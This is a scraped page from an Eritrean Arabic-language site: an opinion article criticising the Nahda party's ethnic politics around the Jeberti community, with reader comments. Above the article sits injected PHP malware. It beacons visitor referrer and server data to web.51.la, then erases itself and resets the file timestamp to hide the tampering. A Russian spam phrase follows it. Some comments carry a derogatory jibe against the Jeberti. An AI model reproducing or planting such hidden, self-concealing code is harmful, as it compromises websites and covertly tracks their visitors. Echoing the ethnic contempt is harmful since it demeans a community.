check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } حزب النهضة الارتري _ التفاخر بالخطيئة
кремлевская диета

حزب النهضة الارتري _ التفاخر بالخطيئة

User Rating: / 6
PoorBest 

 

 

 

 

 

 

 

 

 

 

 

حزب النهضة الارتري _ التفاخر بالخطيئة

* صلاح ابوراي – لندن

 

.. بوضوح اود ان اؤكد بأنني اتناول تجربة سياسية ارترية لا اتفق مع ممارساتها وخطابها السياسي وافصل بينها وبين خطابها القومي القاصد الى تمثيل الجبرتة ولا  تراودني الريبة في انهم لا يمثلون الا عضويتهم، وعليه، فإن خطابهم السياسي المنتحي منحى خطير ونقد رؤيتهم لا تمت بصلة الى الجبرتة ... فإن الجبرته شأنهم  شأن بقية الفئات الاجتماعية الارترية الاخرى مدعى عليها، ولن استطيع ان اضيف شيئاً من الثناء المستحق كما فعل الأخ محمد نور بركان وكذلك ما جاء في مقالات الاخ محمود لوبينت والمقالات الرائعة التي كتبها عن الجبرتة ( المختصر في تاريخ الجبر وما جاء فيها من قوله لا يجتمع سبعة من الجبرتة الا ويفكرون في بناء مسجد..). وكل ذلك يزيدني فخراً واعتزازاً كون جزء من شعب انتمي اليه يضج بتلك الخصائص الجميلة ولا ينبغي ان نسمح لأحد ان ينتزع منا تلك المفاخر باهلنا أو حصرها وقولبتها في عمل سياسي لا يخص الا تنظيم معين او جهة سياسية معينة كما تود النخبة السياسية في النهضة فعله...

اذكر بعد تأسيس حزب النهضة جلسنا – قرابة ال 20 شخص – الى رئيس الحزب الأخ نور ادريس (ابو ادريس) في وليمة تليق به وتناولنا الشأن العام وتداعيات انقسام التحالف الى كتلتين ثلاثة وسبعة وتحفظ حزب النهضة، كما تناولنا المسار القومي لحزب النهضة في تمثيل الجبرتة وباجماع يشبه متفق عليه مسبقاً بين الحضور نصحنا الاخ نور ادريس عن عدم اقحام الجبرتة في النهضة حيث لم نستطع ان نحصر اي فائدة سياسية مرتجية من تشكّل القبائل والقوميات سياسياً ، ولقد اتفق معنا او هكذا ابدى لنا ولكن اتجهت  الامور الى غير ذلك ..ولي بعض الملاحظات السريعة حول هذا لشأن اجملها في الآتي :

1 - هذه التجمعات السياسية القبلية منها والقومية والجهوية ترفد المشكلات الموجودة ولا تعالجها. حيث المنظر السياسي في النهضة وغيرها من الاحزاب المشابهة امتلك تصور حول جذور الاشكالية السياسية في ارتريا وحددها على انها شوفينية واعتبرها]مشكلة[ وتتجلى هذه ال]مشكلة[ من ممارسة فئة اجتماعية معينة لعمل سياسي واستطاعت ان تصل الى سدة الحكم لتستأثر بكل شيء. وهذه ال ]مشكلة[ التي امتلك وعياً تجاهها بأنها ]مشكلة[ وطنية قام حزب النهضة الارتري بمحاكاتها وممارستها برغم اعتبارها بانها ]مشكلة[.

فإذا كان ممارسة عمل سياسي لفئة اجتماعية محددة يعتبر ]مشكلة[ وجريمة فإن النهضة تقوم بنفس ذلك الدور ونفس تلك الممارسة سواء وصلت الى سدة الحكم أو في المسار اليه ولكن جذر الفهم والممارسة متطابق سواء تحقق أو قاصد التحقيق... إن ممارسة نفس ال ]مشكلة[ - تأسيس عمل سياسي على اساس تحيزات اجتماعية – يسمى رد فعل وهو كما هو معلوم هو نفس فعل ونفس ممارسة الخصم أو العدو ولكن في مسار مختلف أي بعضه من بعض...

2 -  كيف اقتنع المنظر والمشرع السياسي في حزب النهضة ان رعاية مصالح وحماية حقوق الحبرتة عبر تنظيم سياسي خاص بهم يناقض جوهر الشوفينية ؟ ان العقل الذي لا يبحث عن الخيارات المتعددة يقوم بمحاكاة المشكلة التي استوعبها وهي آفة ردات الفعل في الخطاب السياسي للمعارضة السياسية الارترية ... يتأمل ماذا يفعل النظام حتى يقوم بمحاكاته .. من وجد ان النظام صليبي طائفي يقوم مباشرة بتأسيس حزب سياسي ديني ! من ادرك ان النظام يمثل فئة اجتماعية معينة يقوم بتقليده بتأسيس حزب سياسي على اساس فئته الاجتماعية كما هو في النهضة والكناما والعفر ويفاخر به! من يستوعب النظام على انه نظام اقليمي يقوم بتأسيس تنظيم اقليمي !. اين الاختلاف ؟. النظام يعتبر شمساً والتنظيمات اجرام تدور في فلكه وتحاكي ممارساته .. هذا الحب والغرام بين النظام كفاعل والتنظيمات المعارضة كمقلدة والمحاكية تدوّر المشاكل السياسية الارترية وترفدها وتزكيها..

3-   الم تسأل القيادة السياسية في النهضة نفسها فيما اذا قامت كل مجموعة اجتماعية بعمل تنظيم سياسي خاص بها فذلك يعني ببساطة تعميد قومية التجرنية وشرعنة حكمها لارتريا والى الأبد كونها القومية الاكبر بين القوميات الاخرى؟ وكم سوف يصبح  نصيب النهضة والفئة المدعى تمثيلها من السلطة والثروة في مقابل الخصم " التجرنية" ؟ ولمصلحة من تأتي هذه المحاصصات في نهاية الأمر للشعب الارتري كافة ام للقومية الأكثر والأكبر ؟.

4-   انا اعلم يقيناً ان اكثر ابناء الجبرتة الذين يتعاطون الشأن العام اسوة باخوتهم الآخرين لا تنطلي عليهم هذه الترهات السياسية ولا يؤمنون بها ولا يدعمونها وان الحراك السياسي والاجتماعي الذي يقام كل ليلة وضحاها وهذا الضجيج في مواقع الانترنت وهذه المناسبات السياسية المتعددة في تعصيب الجبرتة لا يعبر الا عن مجموعة لا تتمتع بادنى مستوى فكري وسياسي ..

5-   من الطبيعي من لم يمتلك رؤية وفكر سياسي يكون ضحية الادلجة القبلية والقومية ولا يقدم حلاً للمشكلة ولكنه يحقق الاحساس بالذات والتميّز عن الآخر وعبادة الشخصية من تزوير التاريخ والادعاء الممجوج لخلق تصور عن الذات وهي صفات مصاحبة للخطاب القومي.. وفي نهاية المطاف خلق مجتمع مستقطب يكون خصم للهوية الجامعة ويهدد السلم الاهلي.. والنهضة تريد اختطاف جزء عزيز من الشعب الارتري والتحدث باسمه وتوغل في مسارها حتى تصل الى الادعاء كما جاء في مهرجان الرياض العبارة الصبيانية الشائنة "ان حق الجبرتي لا يحميه الا الجبرتي"..

6-   محاولة انتشال جزء من الشعب الارتري والادعاء بتمثيله وحماية حقوقه يجب فهمه على انه محاولة لضرب اي مجهود وطني يهدف الى تأسيس عمل وطني مشترك لمعالجة المشكلات وتحقيق التطلعات.. والحمد لله، ان الكثيرين من ابناء الحبرتة في مختلف التنظيمات السياسية وفي قيادات تنظيمية كبيرة كقيادات في الصف الأول وكوادر وقواعد بما في ذلك عضو تنفيذي في المنظمة التي انتمي اليها يؤمنون برسخ كغالبية النخب الارترية ان المشكلة الارترية هي مشكلة وطنية سياسية وحلها يأتي في الاطار السياسي الوطني كتضافر كل جهود ابناء الشعب الارتري .. ولا يخاصم ولا يؤخر هذه الجهود المتضافرة الا الدعاوي والخطاب السياسي الفئوي كذاك الذي تمارسه النهضة وما يناظرها من التنظيمات ..

7-  ان الامم والبلدان تبنيها افكار وآراء سياسية تتصارع وتتلاقح ضمن احزاب سياسية وطنية قادرة على تقديم افضل الحلول والمعالجات لمشكلات البلد سواء كانت دينية أو قومية او اقليمية وجميع مشكلات الهامش كما انها قادرة – اي الاحزاب والتنظيمات الوطنية– على مخاطبة كافة مشكلات الوطن وتقديم افضل الخطط والحلول كما تقدم البرامج والمناهج التي من شأنها ان تحقق رقي وتقدم الأمة وتحقق المنجزات الكبيرة وبمشاركة كافة النخب والفعاليات السياسية تحت شرط الاقتناع بالهدف وليس بشرط الانتماء القبلي أو القومي أو الديني...

8-  محاولة نقدنا ورفضنا لهذه الممارسات السياسية تأتي لكونها تعيق هذا المجهود وتحقن المجتمع بمفاهيم سلبية ويذهب نقدنا تحديداً الى النهضة كون النشاطات الكثيفة التي تملأ الشبكة العنكبوتية والتي تستصحب معها اسم فئة اجتماعية معينة أو تسمى باسمها تعتبر تغريب الآخر من النشاط السياسي ودلائل تفكك وتداعي العمل السياسي الجماعي ... يكون النشاط محموداً اذا ما اتى ضمن نشاط اجتماعي من أجل تعميق التراث وتعزيز التواصل بين الماضي والحاضر والتواصل مع قيم واعراف وتقاليد تلك الفئة او الوطن ولكن النشاطات السياسية التي تتكيء أو تريد للتعبير عن مشكلة فئة اجتماعية معينة يعتبر فرض الوصاية على تلك الفئة دون تفويض وهو ما ينسجم مع مفهوم الديكتاتورية التي تغتصب حق الآخرين وتدعي شرعيتها.

______________________

* كاتب وناشط سياسي ارتري مقيم في بريطانيا

 

 

 

 

 

 

 


Comments 

  1. #6 احمد الجبرتي
    2013-04-0417:40:29 Jandour يقول: "ادا جاوركم الجبرتا في الجنة ارفعوا عفشكم واجروا الى النار"
    ومن قال لك انّ امثالك سيدخلونا الجنة؟ امثالك من الجهلة والمتعصبين سوف يخلدون في النار…
    لأن الإسلام هو تواضع، احترام وتعاون وليس حسد، كراهية وطغيان. الجبرتة لا يحتاجون تصريح من امثال ابوراي او غيره لكي يحددوا ما يريدون… لهم تاريخ وعلماء ومثقفين ويعرفون ما يريدون.
    وردنا للسفهاء هو:
    خاطبنى السفيه بكل عيب فارى العيب ان اكون له مجيبا.
    يزداد سفاهة وازداد حلما كعود زاده الاحراق طيبا.
    هكذا يردون الجبرتة الى المتطفلين السفهاء.
  2. #5 saleem salim
    2012-08-1211:12:35 شكرا ابو منيب لقد قلت مالم يستطيع ان يقوله الاخ صلاح ابوراى. اما الجنة والجهنم فهى حسب اعمالك.
    فهل يعقل ان تهرب من الجتة التى يتمناها كل مسلم الى النارز قريب امرك يأخى. الوطن بحاجة الى صف
    واحد متين وليس للتفرقة. اكرر شكرى لأبو منيب وما التوفيق الامن عند الله.
  3. #4 أبومنيب
    2012-08-0619:56:40 أنا لا أعجب من شخص يحب قبيلته أو يعدد مآثر قومه ‏..‏ فهذا طبيعي ‏.طالما أنه لا يسيئ الى قبيله أخرى ‏.‏ ولكن أعجب من شخص يغيظه ويستفزه ذلك !!! هل تستكثر على قوم خدموا وناضلوا سنين طويله ضمن كيانات مختلفه أن ينادوا فقط أن يعترف بوجودهم ؟!! ‏

    يالكم من بخلاء وأنانيين إتقوا الله ولا تتغطرسوا ‏..‏ فنحن إخوه ‏.‏!!‏
    لماذا جن جنونكم ‏..‏ هل النهضه أوقفت زحفكم الى أسمرة ؟؟
    وكم حزب فى أرتريا ؟ لنقسمها على القوميات أكيد بمعدل ثلاث أحزاب لكل قوميه ‏..!! ياشباب الأحزاب القوميه لها فوائد كثيرة أقلها أنها أدخلت جمهور كبير من الشعب الأرتري الى ساحة المواجه والمعارضه ‏..‏ والذى فشلت فيه المعارضات الأيدلوجيه ‏.

    إن القوميات الأرتريه أغلبها لها إعتراف فى السودان وحاضنه لها كحال أهلنا التجري والهدارب ‏..والرشايدة ‏..؟ الخ
    والذين لم يعترف بهم السودان كمكون ‏..‏ فقد إعترف الهقدف بقوميتهم ‏.‏ يقول الكاتب بهذا الفعل تشرعن النهضه للنظام حكم أرتريا ‏.‏!!!‏
    كيف أخبرني أم هو إدعاء ‏..‏ بل النهضه بسحبها جمهورها تعزل النظام وتحاصره ‏.
    على العموم مقالك جيد بنسبة ‏٨٠‏ ‏%‏ لكن لاتزايدوا على النهضه ولا الجبرته ‏،‏ وهم من صبر على المشاركه مع إخوتهم وحتى الآن ‏..‏ والآن تقوم الدنيا ولاتقعد لأنهم أنشؤا حزب ‏..؟ فالينشؤا ماشاؤا وليجاهدوا كما شاؤا ‏…‏ واذا أساؤا لأحد فردوهم الى الصواااب أما أن تستكثروا عليهم مجرد إنشاء حزب ومجرد سماع إسمهم يصيبكم بالهلوسه ‏..‏ لدرجة تتركون لهم الجنه وتقول عبارة صبيانيه !! وهل يترك الصبيان الجنه ؟؟!!‏
    دعوا الفلسفه على النهضه وأنظروا عدوكم ‏..‏ إن النهضه لم تسئ لأحد لكنه التكبر أسمحوا لي الذى جعل البعض ينسى نفسه ولايصدق أن النهضه حزب ‏،‏ وكأنه حزب فى نيويورك ههههههه خلوا الناس فى حالها

    رجاااااااء ياأحباب ‏…‏ النهضه ولامكونها لم يتورطوا فى دم أحد ولا عرض أحد ولا قتلوا من إنشق عنهم ولا أذوا أحد ‏.؟ والله إنهم مثاليين بمعنى الكلمه ‏.‏!!‏
    المسلم من سلم المسلمين من لسانه ويده ‏..وياماشوفنا وسمعنا كيف كانت الساحه معارضه وحكام .‏ كل السيوف نزفت دما الآااا أهلكم فى النهضه وبعض من من رحم الله من تنظيماتنا حفظها الله ‏..‏ وهم الأن يراجعون أخطائهم وخطواتهم ‏..‏ نسأل الله أن يتم لهم ذلك ‏.

    الخلاااصه ‏…‏ أن مجرد إنشاء حزب النهضه ليست جريمه ولاأحزاب الساهو والعفر ‏..‏ كلنا إخوه ‏..‏ ويجب أن ننقد الأداء ‏..‏ لا أن ننكر الوجود المعذرة ياإخوه لكن الموضوع لايستاهل ‏.‏ ‏
  4. #3 saleem salim
    2012-07-1713:24:36 الاخ المناضل الاستاد صلاح ابوراى. تحية مباركة وبعد, لقد لاحظت تعليق جندور و قيريس . كيف
    يرون الجبرت . هل هم معارضين للنظام فى اريتريا الدى رفض الاعتراف بقوميتهم ممثلا فى محمد محمود
    المعروف بشريفو ام فقط طالبين المارضة الاريترية ان تسوى امورهم وتعترف بقوميتهم عندما ينتهى نظام
    افورقى. ؟ اما ان يقال ادا جاوروك الجبرتا فى الجنة ارفعوا عفشكم واجروا الى النار. الى هده الدرجة يأخ
    جندور. لاتنسى بأنهم اخوتا لنا فى الاسلام. انا لست من الجبرت ولكن الحق يقال ولو كان مرا.
    ان المقال الطويل للاخ صلاح فأرجو ان يرد على مثل هده التعليقات قبل ان تاخد مجرى غير مجراها
    وفقكم الله ورمضن كريم لكل المسلمين وخاصة الاريتريين الدين يعانون مر الغربة = اخوكم سليم
  5. #2 jandour
    2012-06-0920:02:18 صلاح اسمح لي ان ارد نيابة عنك الى الاستاد لوبينت اولا اقول له مبروك عليك صداقة الجبرتالكن نحن نقول فيهم ما قاله الاستاد حسين محمد صالح دويد عندما حصل له موقف ولم تسعفه صداقتهم فقال ان صداقة الجبرتا **** **** اوله حلو واخره عداب ادا جاوركم الجبرتا في الجنة ارفعوا عفشكم واجروا الى النار … الخ نكتفي بهدا القدر
  6. #1 قبريس
    2012-06-0208:46:39 الأستاذ صلاح أبوراي - لقد اصبت الهدف واضفت شئ مهم الى ما قاله الأستاذ محمد نور وهو ان جماعة النهضة لم تفوض من قبل الجبرتا وان محاولة فرض الوصاية على الجبرتا هو الديكتاتورية بعينه ولا يختلف عن ما يقوم به نظام الهقدف البغيض. واذا عرفنا ان جماعة النهضة ما هي الا صنيعة الوياني ولم تاتي الى ساحة المعارضة الارترية الا في السنوات القليلة الماضية ندرك بان اجندة هذه المجموعة هي ليست نصرة الجبرتا او المساهمة في الحراك الوطني المعارض بقدر ما هي مجموعة مكونة من قبل اجندة خارجية لتاجيج النعرات ولتفتيت النسيج الاجتماعي والسياسي الارتري، ولو كان لهذه المجموعة الانتهازية ادنى درجة من الشجاعة والصدق لاعلنوا عن انفسهم بانهم جماعة قومية او قبلية ولشاركوا في مؤتمر \\\"مقيلي\\\" المشؤوم كبقية \\\"تجار القومية\\\" ولكن جبنهم وانتهازيتهم جعلهم يتخبطوا ما بين الادعاء بانهم تنظيم قومي والتظاهر بالوطنية. ولعلمك حتى هذه اللحظة لم تقم هذه المجموعة باي دراسة تذكر لاثبات قومية \\\"الجبرتا\\\" كما حاول الشهيد الدكتور ياسين أبرا - رحمه الله - وادي بحياته في سبيل ذلك، او كما فعلت الحركة الفيدرالية باعلانها الواضح والصريح ان \\\"الجبرتا قومية قائمة بذاتها ولا يحق لاحد ان يفرض عليها اي هوية غير الذي ترتضيه هي لنفسها\\\"…وكل هذه المواقف اتخذت بسنوات عديدة وقبل ان يكون اي وجود لسماسرة النهضة وقبل ان يظهر على السطح مشروع وياني التفتيتي، والا لو كان امر الجبرتا يعني جماعة النهضة لقامو اما بنشاط اجتماعي، كما اشرتم، واكاديمي لابراز هوية الجبرتا المنفصلة عن قومية التجرنيا دون السباحة ببيانات وهمية على صفحات الانترنيت او لانضمو الى الحركة الفيدرالية التي اعلنت عن موقفها المدافع عن حقوق الجبرتا في التمتع بهوية قومية خاصة بهم…ولذا لقد آن الاوان لفضح وتعرية مثل هذه المجاميع المتاجرة والخطيرة قبل ان تتحول الى كابوس يعشعش على صدر الجبرتا والوطن باثره.

Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player

عمود الكتاب العربي

Arkokabay.com
Arkokabay.com
OMAR JABIR الأستاذ عمر جابر
OMAR JABIR الأستاذ عمر جابر
Zein Shokayالأستاذ زين شوكاي
Zein Shokayالأستاذ زين شوكاي
سعادة السفير حمد كلُ
سعادة السفير حمد كلُ
الأستاذ صلاح أبوراي
الأستاذ صلاح أبوراي
 الأستاذة حنان
الأستاذة حنان
الأستاذ موسى ضرار
الأستاذ موسى ضرار
الأستاذ أبو الرشيد
الأستاذ أبو الرشيد
الأستاذ عبدالفتاح ود الخليفة
الأستاذ عبدالفتاح ود الخليفة
الأستاذ ياسين محمد عبدالله
الأستاذ ياسين محمد عبدالله
الأستاذ محمد نور - بركان
الأستاذ محمد نور - بركان
الأستاذ جمال همد
الأستاذ جمال همد
الأستاذ فكاك ناير
الأستاذ فكاك ناير
الأستاذ أحمد صلاح الدين
الأستاذ أحمد صلاح الدين
Amal Ali الأستاذة أمال علي
Amal Ali الأستاذة أمال علي
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
الأستاذ حسن سلمان
الأستاذ حسن سلمان
الأستاذة منى محمد صالح
الأستاذة منى محمد صالح
الاستاذة نوره فارس
الاستاذة نوره فارس